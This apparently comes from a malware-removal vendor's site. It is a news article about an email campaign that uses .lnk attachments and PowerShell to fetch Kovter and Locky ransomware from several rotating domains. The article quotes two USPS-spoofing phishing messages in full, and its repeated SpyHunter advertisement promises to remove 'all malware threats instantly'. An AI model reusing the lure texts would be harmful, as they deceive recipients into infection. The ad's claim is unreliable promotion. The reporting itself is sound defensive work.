Aggressive computer hackers are distributing a new email campaign that delivers both Kovter and Locky to their targets.
Kovter And Locky Delivered In A New Wave Of Malware Campaigns
SpyHunter anti-malware tool will diagnose all current threats on the computer. By purchasing the full version, you will be able to remove all malware threats instantly. Additional information about SpyHunter / Help to uninstall SpyHunter
Computer criminals are using a combination of a new generation of scripts to install both Kovter and Locky on their target hosts. Security experts discovered a few months ago an emerging email campaign that distributed .lnk files using a malicious script that infects with the Locky ransomware. When the malicious file is opened this executes an embedded PowerShell script which downloads the relevant threat from a download site. A more complex version of this has been discovered which delivers various malware from an extended list of sites.
The new script uses no less than five different domains to attempt to download the relevant malware. In addition to the Locky ransomware it also delivers Kovter. It also attempts to access a specific location in the domain by using a parameter value, all hardcoded domains are attempted until the payload is successfully installed. If the payload is unable to be downloaded another parameter value is initiated. The reason why multiple domains and this technique are used is to prevent various URL filtering options that may prohibit the infection.
Sample Kovter And Locky Email Bearing Messages
As usual the malicious scripts are delivered using email campaigns that use social engineering tricks. Here is an example message which spoofs the USPS delivery notification:
Dear Roberto,
This is to confirm that your item has been shipped at January 24.
Review the document that is attached to this e-mail!
Thank you for your assistance in this matter, Marion Wooodard, USPS Mail Delivery Clerk.
Another sample message reads the following:
Dear Norma,
We can not deliver your parcel arrived at January 20.
Please check the attachment for details!
Best regards,
Wayne Christensen,
USPS Mail Delivery Clerk.
The downloaded Kovter And Locky infections the relevant encryption engine is started and the target user data is encrypted using a strong cipher. Depending on the Locky strains a different extension may be used – Zepto, Odin, Thor, Aesir or Osiris.
For more information about this emerging threat you can read Microsoft’s detailed post.
SpyHunter anti-malware tool will diagnose all current threats on the computer. By purchasing the full version, you will be able to remove all malware threats instantly. Additional information about SpyHunter / Help to uninstall SpyHunter
